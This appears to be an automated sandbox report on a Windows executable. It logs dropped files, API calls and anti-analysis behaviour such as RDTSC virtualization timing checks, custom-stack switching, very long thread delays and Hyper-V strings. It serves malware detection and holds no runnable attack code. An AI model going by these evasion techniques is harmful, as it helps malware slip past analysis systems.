Source: Yara match

File source: 00000000.00000002.2385539475.0000000003DC5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe

Code function: 0_2_72ED1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_72ED1B5F

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe

Code function: 3_2_3387242B push dword ptr [edi+eax*2-75h]; iretd

3_2_338723BD

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe

File created: C:\Users\user\AppData\Local\Temp\nss456A.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	API/Special instruction interceptor: Address: 467A46C
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	API/Special instruction interceptor: Address: 2B1A46C

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	RDTSC instruction interceptor: First address: 463D053 second address: 463D053 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F8D6CB1F6AAh 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	RDTSC instruction interceptor: First address: 2ADD053 second address: 2ADD053 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F8D6CC229AAh 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Memory allocated: 33890000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Memory allocated: 33530000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 599187	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 597546	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 596780	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 596042	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 595930	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 595047	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 594563	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 594453	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 594344	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 594219	Jump to behavior

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Window / User API: threadDelayed 7925			Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Window / User API: threadDelayed 1915			Jump to behavior

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss456A.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe

API coverage: 3.6 %

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2760	Thread sleep count: 7925 > 30	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2760	Thread sleep count: 1915 > 30	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -599516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -599406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -599297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -599187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -599078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -598969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -598859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -598750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -598640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -598531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -598422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -598312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -598203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -598094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -597984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -597765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -597546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -597328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -597219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -597109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -597000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -596890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -596780s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -596672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -596562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -596453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -596344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -596042s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -595930s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -595813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -595703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -595594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -595484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -595375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -595265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -595156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -595047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -594938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -594813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -594688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -594563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -594453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -594344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752	Thread sleep time: -594219s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 0_2_0040672B FindFirstFileW,FindClose,	0_2_0040672B
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405AFA
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_00402868 FindFirstFileW,	3_2_00402868
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_0040672B FindFirstFileW,FindClose,	3_2_0040672B
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Code function: 3_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	3_2_00405AFA

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 599187	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 597546	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 596780	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 596042	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 595930	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 595047	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 594563	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 594453	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 594344	Jump to behavior
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	Thread delayed: delay time: 594219	Jump to behavior

Source: b5BQbAhwVD.exe, 00000003.00000002.3365100943.00000000031D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0X#
Source: b5BQbAhwVD.exe, 00000003.00000002.3365100943.0000000003231000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: b5BQbAhwVD.exe, 00000003.00000002.3365100943.0000000003231000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW~

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	API call chain: ExitProcess graph end node			graph_0-4590
Source: C:\Users\user\Desktop\b5BQbAhwVD.exe	API call chain: ExitProcess graph end node			graph_0-4746

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe

Code function: 0_2_00406831 LdrInitializeThunk,WideCharToMultiByte,GetProcAddress,

0_2_00406831

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe

Code function: 0_2_72ED1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_72ED1B5F

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\b5BQbAhwVD.exe

Process created: C:\Users\user\Desktop\b5BQbAhwVD.exe "C:\Users\user\Desktop\b5BQbAhwVD.exe"

Jump to behavior

